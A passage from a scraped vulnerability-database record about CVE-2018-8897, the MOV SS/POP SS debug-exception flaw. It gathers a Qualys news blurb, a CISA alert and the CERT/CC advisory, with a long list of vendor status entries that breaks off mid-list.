They could then run arbitrary code in kernel mode and \u201cinstall programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nMore information is available from [Red Hat](<https://access.redhat.com/security/vulnerabilities/pop_ss>) and [VMware](<https://kb.vmware.com/s/article/54988>).\n\n### In other security news \u2026\n\n * There are reports of new \u201ctext bombs\u201d that can crash mobile apps like iMessage and Whatsapp, as well as iPhones and Android devices, but their impact has been greatly exaggerated, according to independent security analyst [Graham Cluley](<https://hotforsecurity.bitdefender.com/blog/text-bombs-and-black-dots-of-death-plague-whatsapp-and-imessage-users-19891.html#new_tab>). \n * The source code for the TreasureHunter malware has been leaked, which will help researchers better understand it but which may trigger the creation of new variants, [reports](<https://threatpost.com/pos-malware-treasurehunter-source-code-leaked/131891/>) Tom Spring in ThreatPost.\n * LG has patched a pair of \u201csevere\u201d vulnerabilities affecting its smartphones' keyboards, [according to ThreatPost\u2019s Tara Seals](<https://threatpost.com/severe-keyboard-flaws-in-lg-smartphones-allow-remote-code-execution/131829/>).", "modified": "2018-05-14T18:47:42", "published": "2018-05-14T18:47:42", "id": "QUALYSBLOG:12D0AED8A6507BA497CB8CC165A00D0A", "href": "https://blog.qualys.com/news/2018/05/14/what-weve-got-here-is-failure-to-communicate-os-vendors-misread-cpu-docs-create-flaw", "type": "qualysblog", "title": "What we\u2019ve got here is failure to communicate: OS vendors misread CPU docs, create flaw", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-02-24T18:07:25", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "CERT Coordination Center (CERT/CC) has released information for 
[CVE-2018-8897](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>) \u2013 unexpected behavior for debug exceptions. A local attacker could exploit this bug to obtain sensitive information.\n\nNCCIC encourages users and administrators to review CERT/CC\u2019s [Vulnerability Note VU #631579](<https://www.kb.cert.org/vuls/id/631579>) for more information and refer to operating system or software vendors for appropriate patches.\n", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "CISA:C1D0E305B2191ADE13845CF38D356802", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/05/08/Debug-Exception-May-Cause-Unexpected-Behavior", "type": "cisa", "title": "Debug Exception May Cause Unexpected Behavior", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:06", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "### Overview \n\nIn some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. 
The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV SS and POP SS.\n\n### Description \n\n[**CWE-703**](<http://cwe.mitre.org/data/definitions/703.html>)**: Improper Check or Handling of Exceptional Conditions - **CVE-2018-8897\n\nThe MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV SS or POP SS instruction itself). Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol 3A; section 2.3). \n \nIf the instruction following the MOV SS or POP SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at Current Privilege Level (CPL) < 3, a debug exception is delivered after the transfer to CPL < 3 is complete. Such deferred #DB exceptions by MOV SS and POP SS may result in unexpected behavior. \n \nTherefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3. This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions. \n \nSeveral operating systems appear to incorrectly handle this exception due to interpretation of potentially unclear existing documentation and guidance on the use of these instructions. \n \nMore details can be found in the [researcher's paper](<https://everdox.net/popss.pdf>). 
\n \n--- \n \n### Impact \n\nAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCheck with your operating system or software vendor for updates to address this issue. There is no expected performance impact for applying an update. A list of affected vendors and currently-known updates is provided below. \n \n--- \n \n### Vendor Information\n\n### Apple __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nApple has released [Security Update 2018-001](<https://support.apple.com/en-us/HT208742>) to address this issue.\n\n### Vendor References\n\n * <https://support.apple.com/en-us/HT208742>\n\n### Check Point Software Technologies __ Affected\n\nNotified: May 01, 2018 Updated: May 10, 2018 \n\n**Statement Date: May 10, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCheck Point sees these as non-exploitable, taking our business logic and best practices into consideration. 
\n \nSee details at SecureKnowledge [sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>)\n\n### DragonFly BSD Project Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project __ Affected\n\nNotified: April 30, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nMore information is available in the [FreeBSD Security Advisory 18:06](<https://security.freebsd.org/advisories/FreeBSD-SA-18:06.debugreg.asc>).\n\n### Vendor References\n\n * <https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>\n\n### Linux Kernel __ Affected\n\nUpdated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe issue was fixed upstream on March 23, and the Linux \"stable\" branches were fixed shortly thereafter. Therefore the following kernels (or higher) contain the patch: 4.15.14, 4.14.31, 4.9.91, 4.4.125. 
The older 4.1, 3.16, and 3.2 branches are also affected.\n\n### Microsoft __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n**The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.**\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>\n\n### Red Hat, Inc. __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nRed Hat Enterprise Linux is affected. Please see the [security advisory](<https://access.redhat.com/security/vulnerabilities/pop_ss>) for more information.\n\n### Vendor References\n\n * <https://access.redhat.com/security/vulnerabilities/pop_ss>\n\n### Ubuntu Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see Ubuntu Security Notices [USN-3641-1](<https://usn.ubuntu.com/3641-1/>) and [USN-3641-2](<https://usn.ubuntu.com/3641-2/>) for more details.\n\n### Vendor References\n\n * <https://usn.ubuntu.com/3641-1/>\n * <https://usn.ubuntu.com/3641-2/>\n\n### VMware __ Affected\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have 
not received a statement from the vendor.\n\n### Vendor Information \n\nVMware has issued a [statement](<https://kb.vmware.com/s/article/54988>) about this vulnerability report. Please see the statement for full details.\n\n### Vendor References\n\n * <https://kb.vmware.com/s/article/54988>\n\n### Xen __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll versions of Xen are vulnerable. Only x86 systems are vulnerable. ARM systems are not vulnerable. \n \nOnly x86 PV guests can exploit the vulnerability. x86 HVM and PVH guests cannot exploit the vulnerability. \n \nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users. \n \n \nMITIGATION \n========== \n \nRunning only HVM or PVH guests avoids the vulnerability. \n \nNote however that a compromised device model (running in dom0 or a stub domain) can carry out this attack, so users with HVM domains are also advised to patch their systems. 
\n \n \nRESOLUTION \n========== \nApplying the appropriate attached patch resolves this issue.\n\n### Vendor Information \n\nFor the full statement, please see [Xen Advisory 260](<https://xenbits.xen.org/xsa/advisory-260.html>).\n\n### Vendor References\n\n * <https://xenbits.xen.org/xsa/advisory-260.html>\n\n### Brocade Communication Systems Not Affected\n\nNotified: May 01, 2018 Updated: May 30, 2018 \n\n**Statement Date: May 27, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel __ Not Affected\n\nNotified: May 01, 2018 Updated: May 09, 2018 \n\n**Statement Date: May 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nAt this time, we are not aware of any Intel Products affected by CVE-2018-8897.\n\n### Vendor References\n\n * [httpwww.intel.com/sdm](<httpwww.intel.com/sdm>)\n\n### Joyent __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSmartOS does not allow access to the debug register outside of debug mode and so is not affected.\n\n### NetBSD __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNetBSD does not support debug register and so is not affected.\n\n### OpenBSD Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 
QUALCOMM Incorporated Not Affected\n\nNotified: May 01, 2018 Updated: June 06, 2018 \n\n**Statement Date: June 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL __ Not Affected\n\nNotified: May 01, 2018 Updated: May 21, 2018 \n\n**Statement Date: May 14, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNo Zyxel products are vulnerable to unexpected operating system behavior resulting from an Intel architecture hardware debug exception, as reported in [CERT/CC] vulnerability note VU#631579 at <https://www.kb.cert.org/vuls/id/631579>. \n\n### Vendor Information \n\nZyxel has issued Zyxel-SA-1135-01 stating that no products are affected.\n\n### eero Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ADTRAN Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding 
this vulnerability.\n\n### ARRIS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ASP Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AVM GmbH Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actiontec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AirWatch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding 
this vulnerability.\n\n### Android Open Source Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Appgate Network Security Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arch Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AsusTek Computer Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. 
Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Broadcom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CA Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cambium Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this 
vulnerability.\n\n### Cisco Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Command Software Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell EMC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information 
regarding this vulnerability.\n\n### DesktopBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Deutsche Telekom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Devicescape Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Digi International Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EfficientIP SAS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Espressif Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not 
aware of further vendor information regarding this vulnerability.\n\n### F-Secure Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Force10 Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GNU glibc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor 
Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HTC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HardenedBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Honeywell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information 
regarding this vulnerability.\n\n### IBM, INC. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### InfoExpress, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Interniche Technologies, inc. 
Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lancope Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lantronix Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Marvell Semiconductors Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 
MediaTek Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MetaSwitch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Micro Focus Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microchip Technology Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MikroTik Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mitel Networks, Inc. 
